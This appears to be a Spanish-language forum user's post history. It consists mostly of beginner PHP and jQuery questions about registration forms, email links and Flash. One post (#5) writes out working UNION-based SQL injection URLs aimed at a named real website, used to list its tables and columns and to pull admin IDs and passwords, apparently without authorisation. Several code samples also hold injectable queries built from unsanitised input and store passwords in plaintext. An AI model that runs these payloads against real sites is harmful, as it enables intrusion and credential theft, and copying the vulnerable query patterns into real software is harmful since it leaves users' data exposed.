Hola Shell Root, he echo lo que has dicho y parece que esta bien formada la consulta.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Desarrollo Web / Problema con formulario
6 Septiembre 2013, 19:51 PM
Hola a todos,
estoy haciendo un formulario de registro que cuando escribes por ejemplo el usuario, utilizando jquery i ajax, se comprueva que el usuario no exista en la base de datos, si ya existe sale un mensaje debajo del campo de texto.
Hasta aquí todo bien pero el problema es que aún que me salga el mensajito de "Este nombre de usuario ya existe", si le doy clic a enviar se envia igualmente. Lo que me gustaria saber es como hacer para que si sale el mensaje de "error" no se envie.
Codigo Jquery i Ajax
Codigo PHP que se llama para hacer la comprovación (verificauser.php)
Graciass!!
estoy haciendo un formulario de registro que cuando escribes por ejemplo el usuario, utilizando jquery i ajax, se comprueva que el usuario no exista en la base de datos, si ya existe sale un mensaje debajo del campo de texto.
Hasta aquí todo bien pero el problema es que aún que me salga el mensajito de "Este nombre de usuario ya existe", si le doy clic a enviar se envia igualmente. Lo que me gustaria saber es como hacer para que si sale el mensaje de "error" no se envie.
Codigo Jquery i Ajax
Código [Seleccionar]
<script src="jquery-1.10.2.min.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function(){
var consulta;
$("#usuari").blur();
$("#usuari").change(function(e){
consulta = $("#usuari").val();
$("#usersql").queue(function(n) {
$("#usersql").html('<img src="ajaxloader.gif" /> <font size="2">Comprovant...</font>');
$.ajax({
type: "POST",
url: "verificauser.php",
data: "b="+consulta,
dataType: "html",
error: function(){
alert("error petició ajax");
},
success: function(data){
$("#usersql").html(data);
n();
}
});
});
});
});
</script>Codigo PHP que se llama para hacer la comprovación (verificauser.php)
Código [Seleccionar]
<?php
$user = $_POST['b'];
if(!empty($user)) {
comprobar($user);}
function comprobar($b) {
$con = mysql_connect('localhost','usuario', 'contraseña');
mysql_select_db('nombrebd', $con);
$sql = mysql_query("SELECT * FROM tabla WHERE usuari = '$b'",$con);
$contar = mysql_num_rows($sql);
if($contar == 0){
echo "<span style='font-size:12px;font-weight:bold;color:#16DF00;'>OK</span>";
}else{
echo "<span style='font-size:12px;color:red;'>Usuari ja existent</span>";
}
}
?>Graciass!!
#3
Desarrollo Web / Problema con confirmación de registro
26 Agosto 2013, 13:38 PM
Hola a todos!
Estoy haciendo una pagina de registro la cual quando envias el formulario te envia un correo de confirmación con una url para terminar el registro, pero el problema es que cuando le doy clic a la url me sale el siguiente error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Necesitaria saber a que se debe y como lo puedo solucionar.
Os dejo los codigos a continuación:
Confirma.php
Graciass!!
Estoy haciendo una pagina de registro la cual quando envias el formulario te envia un correo de confirmación con una url para terminar el registro, pero el problema es que cuando le doy clic a la url me sale el siguiente error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Necesitaria saber a que se debe y como lo puedo solucionar.
Os dejo los codigos a continuación:
Código [Seleccionar]
<?php
require('phpmailer/class.phpmailer.php');
$mail = new PHPMailer();
$mail->Host = 'ssl://smtp.gmail.com';
$mail->Port = 465;
$mail->IsSMTP();
include ('funciones.php');
$user = $_POST['user'];
$pass = $_POST['pass'];
$pass2 = $_POST['pass2'];
$email = $_POST['mail'];
if($pass !== $pass2){
echo 'Las contraseñas no coinciden.';
}else{
$codic = rand(0000000000,9999999999);
if(!mysql_query("INSERT INTO noactiu (usuario,contraseña,email,codigo) values ('$user', '$pass', '$email', '$codic')")){
die (msql_error());
}else{
$mail->From = "email@gmail.com";
$mail->FromName = "Nombre";
$mail->AddAddress($email);
$mail->WordWrap = 50;
$mail->IsHTML(true);
$mail->Subject = 'Activación de cuenta';
$mail->Body = 'Para completar el registro haz clic en el siguiente link:<br>.
echo <a href ="http://pagina.com/confirma.php?codic='.$codic.'">http://pagina.com/confirma.php?codic='.$codic.'</a>';
$mail->AltBody = strip_tags($mail->Body);
$mail->SMTPAuth = true;
$mail->Username = 'email';
$mail->Password = 'contraseña';
if ($mail->Send()){die('Hemos enviado un email de confirmación a tu correo');
}else{
die('Ha habido un problema a la hora de enviarle el mensaje de confirmación');
}
}
}
?>Confirma.php
Código [Seleccionar]
<?php
$v = $_GET['codic'];
include('funciones.php');
$query = "SELECT * FROM noactiu WHERE codigo = '".$v."'";
$buscar = mysql_query($query) or die('Error: Ha habido un problema con el query');
if($resultado = mysql_num_rows($buscar) == 1){
if(!mysql_query("DELETE FROM noactiu WHERE codigo = '".$v."' LIMIT 1")){
die(mysql_error());
}
if(!mysql_query("INSERT into noinject (usuario,contraseña,email) values ('".$resultado['usuario']."','".$resultado['contraseña']."','".$resultado['email']."'")){
die(mysql_error());
}
echo '¡Felicidades has sido registrado correctamente!';
}else{
die('URL no válida');
}
?>Graciass!!
#4
Bugs y Exploits / Re: Problema con inyección SQL
11 Julio 2013, 18:44 PM
Ya he probado de hacerlo solo poniendo concat i poniendo gropu_concat pero me sigui dando el mismo error
#5
Bugs y Exploits / Problema con inyección SQL
9 Julio 2013, 02:08 AM
Hola a todos!
Estoy haciendo un trabajo sobre vulnerabilidades informáticas i ahora las estoy probando para ver su funcionamiento, he estado haciendo inyección SQL en una web i al principio todo iba perfecto, he podido ver los nombres de las tablas, he encontrado la de admin, he podido ver los nombres de las columnas, pero a la hora de mostrar la información que contiene la tabla me sale este error:
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /nfs/c01/h12/mnt/9330/domains/blamm.com/html/top10.php on line 17
A continuación os dejo los pasos que he seguido para llegar hasta donde estoy, si veis algun error decidmelo porfavorr.
Para ver el nombre de las tablas:
Para ver el nombre de las columnas:
admin = 97,100,109,105,110
I finalmente para ver la información de la tabla (aquí es donde me da error):
Porfavor ayudadmee!!
Estoy haciendo un trabajo sobre vulnerabilidades informáticas i ahora las estoy probando para ver su funcionamiento, he estado haciendo inyección SQL en una web i al principio todo iba perfecto, he podido ver los nombres de las tablas, he encontrado la de admin, he podido ver los nombres de las columnas, pero a la hora de mostrar la información que contiene la tabla me sale este error:
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /nfs/c01/h12/mnt/9330/domains/blamm.com/html/top10.php on line 17
A continuación os dejo los pasos que he seguido para llegar hasta donde estoy, si veis algun error decidmelo porfavorr.
Para ver el nombre de las tablas:
Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.tables+limit+0,1--Para ver el nombre de las columnas:
Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema.columns+where+table_name=char(97,100,109,105,110)+limit+0,1--admin = 97,100,109,105,110
I finalmente para ver la información de la tabla (aquí es donde me da error):
Código [Seleccionar]
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,group_concat(admin_id,0x3a,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+admin--Porfavor ayudadmee!!
#6
Diseño Gráfico / Re: GIMP y el selector de color
19 Abril 2012, 19:34 PM
Prueba de ir a la pestaña color y haz clic encima de la opción color alfa, te saldrá una ventana en la cual habrá una opción para triar el color, en esta seleccionas el color que quieras hacer desaparecer y le das en aceptar, y listo.
#7
Diseño Gráfico / problema con FLASH
19 Abril 2012, 19:30 PM
Hola a todos, tengo un problema con el programa Flash, el caso es que estoy creando una animación con este pero ahora cuando lo vuelvo a abrir me sale una ventanilla que dice "Formato de archivo inesperado". He probado de descargarme varios recopiladores de archivos flash para convertir el archivo swf a flv pero o no funciona o no lo se hacer, por favor ayudadme, necesito esa animación!!!
#8
PHP / Re: Problema de link en php
3 Febrero 2012, 14:42 PM
Muchas graciasss, me ha servido mucho!!!
#9
PHP / Re: Problema de link en php
1 Febrero 2012, 14:55 PM
Lo que me habeis dicho no me funciona i la unica vez que me ha funcionado en el mensaje que me ha llegado a mi correo ha salido esto:
<a href='http://pagina_web.com'> Nombre de la página< /a>
<a href='http://pagina_web.com'> Nombre de la página< /a>
#10
PHP / Problema de link en php
31 Enero 2012, 18:50 PM
Hola a todos, yo estoy haciendo un formulario y quiero que en el mensaje que envie a quien lo reciva le salga un link en el que clicar y ir a la pagina del link, pero no lo se hacer. Aquí hos dejo el código.
PORFAVOR AYUDADME!!!!!!!
PORFAVOR AYUDADME!!!!!!!
Código [Seleccionar]
<?php
$de = $_POST['de'];
$para = $_POST['para'];
$receptor = "$para";
$mensaje = "<html>
<body>
<a href="http://pagina_web.com">Nombre de la pagina</a>";
mail($para,"Asunto",$mensaje,"From: ".$para." <".$de.">");
include("correcto.html");
?>